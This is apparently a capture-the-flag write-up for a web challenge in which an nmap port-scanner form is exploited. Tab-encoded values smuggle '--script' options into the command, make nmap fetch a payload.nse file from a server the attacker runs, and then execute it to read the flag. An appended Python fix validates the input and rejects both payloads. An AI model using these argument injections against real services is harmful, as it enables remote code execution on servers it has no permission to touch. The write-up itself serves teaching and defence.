CSC2023 - [Web] - SSCIT Web Scanner
Challenge Description
It's just an application to scan your IP with port. What can possibly go wrong?
Solution
Given an IP and port, the application scans it using nmap.
Nmap has the Nmap Scripting Engine (NSE), which we can use to run nmap scripts.
Go to this site
Argument Injection
Using NSE scripts, we can upload our payload to the server and then run it.
First, I would create a file containing the following content:
os.execute('cat /flag-*')
I named it payload.nse
Run the HTTP server using the following command:
python3 -m http.server 8899
Payload 1
service=172.17.0.1:8899%09--script%09http-fetch%09--script-args%09http-fetch.destination=/tmp,http-fetch.url=/payload.nse
Getting requests on the HTTP server
Payload 2
service=172.17.0.1:8899%09--script%09/tmp/172.17.0.1/8899/payload.nse
Flag
CSC{Inj3ct10ns_4re_s0_b4d}
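Fix (added example)
The defensive counterpart to the two payloads above, added here as an example and not taken from the challenge's source, which this writeup does not show. It assumes the application receives the service field as one string and should pass nmap only an IPv4 address and a port; build_nmap_argv and audit are hypothetical names.

```python
import ipaddress
from urllib.parse import unquote

# The two form values from this writeup, URL-encoded exactly as submitted.
PAGE_PAYLOADS = [
    "172.17.0.1:8899%09--script%09http-fetch%09--script-args%09"
    "http-fetch.destination=/tmp,http-fetch.url=/payload.nse",
    "172.17.0.1:8899%09--script%09/tmp/172.17.0.1/8899/payload.nse",
]


class InvalidService(ValueError):
    """The service field is not a plain IPv4:port pair."""


def build_nmap_argv(service: str) -> list[str]:
    """Validate a decoded 'ip:port' value and return a fixed argv list."""
    host, sep, port = service.partition(":")
    if not sep:
        raise InvalidService("expected ip:port")
    try:
        # Accepts only a bare dotted quad: no whitespace, tabs or dashes.
        addr = ipaddress.IPv4Address(host)
    except ValueError as exc:
        raise InvalidService(f"bad address {host!r}") from exc
    # ASCII digits only, so '8899\t--script' can never pass as a port.
    if not (port.isascii() and port.isdigit() and len(port) <= 5):
        raise InvalidService(f"bad port {port!r}")
    if not 1 <= int(port) <= 65535:
        raise InvalidService(f"port out of range {port!r}")
    # Options are chosen by the server; user data fills two typed slots.
    # Pass this list to subprocess.run() without shell=True.
    return ["nmap", "-p", str(int(port)), str(addr)]


def audit(encoded: str) -> dict:
    """Compare what a whitespace-splitting builder sees with the validator."""
    decoded = unquote(encoded)  # %09 becomes a literal tab
    # Assumption: a builder that splits on whitespace yields these tokens.
    report = {"whitespace_tokens": decoded.split(), "argv": None, "error": None}
    try:
        report["argv"] = build_nmap_argv(decoded)
    except InvalidService as exc:
        report["error"] = str(exc)
    return report


if __name__ == "__main__":
    for value in PAGE_PAYLOADS + ["172.17.0.1:8899"]:
        print(audit(value))
```

Both payloads are rejected at the port check because the tab and everything after it land in the port slot, while a plain 172.17.0.1:8899 produces a four-element argv with no user-controlled options.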
Writeups 2023 © RootxRAN.